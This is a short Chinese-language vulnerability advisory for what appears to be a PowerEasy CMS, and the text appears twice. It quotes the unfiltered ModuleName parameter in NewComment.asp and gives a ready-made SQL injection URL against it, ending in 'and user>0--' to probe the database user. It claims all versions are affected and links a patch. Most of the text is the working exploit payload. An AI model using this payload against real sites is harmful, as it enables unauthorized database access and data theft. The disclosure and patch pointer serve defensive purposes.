在NewComment.asp文件中 ModuleName = Trim(request(\"ModuleName\")) 这个ModuleName变量没过滤好,从而导致,我们可以在下面的SQL语句中构造我们的 SQL语句 If ModuleName <> \"\" Then If ChannelID <> 0 Then If ClassID <> 0 Then sqlComment = \"Select top \" & Num & \" C.* from PE_Comment C left join PE_\" & ModuleName & \" A on C.InfoID=A.\" & ModuleName & \"ID where A.ChannelID= \" & ChannelID & \" and A.ClassID= \" & ClassID & \" and C.Passed =\" & PE_True sqlComment = \"Select top \" & Num & \" C.* from PE_Comment C left join PE_\" & Article+A+on+C.InfoID=A.ArticleID+where+A.ChannelID=1+and+1=1 在A.ChannelID=1后就可以构造我们的SQL语句。(其中空格用+来代替。) NewComment.asp?num=1&ChannelID=1&ClassID=1&ModuleName=Article+A+on+C.InfoID=A.ArticleID+where+A.ChannelID=1%20and%20user>0-- 所有版本(包括免费版、商业SQL版及Access版) 补丁下载:...
在NewComment.asp文件中 ModuleName = Trim(request(\"ModuleName\")) 这个ModuleName变量没过滤好,从而导致,我们可以在下面的SQL语句中构造我们的 SQL语句 If ModuleName <> \"\" Then If ChannelID <> 0 Then If ClassID <> 0 Then sqlComment = \"Select top \" & Num & \" C.* from PE_Comment C left join PE_\" & ModuleName & \" A on C.InfoID=A.\" & ModuleName & \"ID where A.ChannelID= \" & ChannelID & \" and A.ClassID= \" & ClassID & \" and C.Passed =\" & PE_True sqlComment = \"Select top \" & Num & \" C.* from PE_Comment C left join PE_\" & Article+A+on+C.InfoID=A.ArticleID+where+A.ChannelID=1+and+1=1 在A.ChannelID=1后就可以构造我们的SQL语句。(其中空格用+来代替。) NewComment.asp?num=1&ChannelID=1&ClassID=1&ModuleName=Article+A+on+C.InfoID=A.ArticleID+where+A.ChannelID=1%20and%20user>0-- 所有版本(包括免费版、商业SQL版及Access版) 补丁下载: http://bbs.powereasy.net/dispbbs.asp?boardID=67&ID=280136&page=1
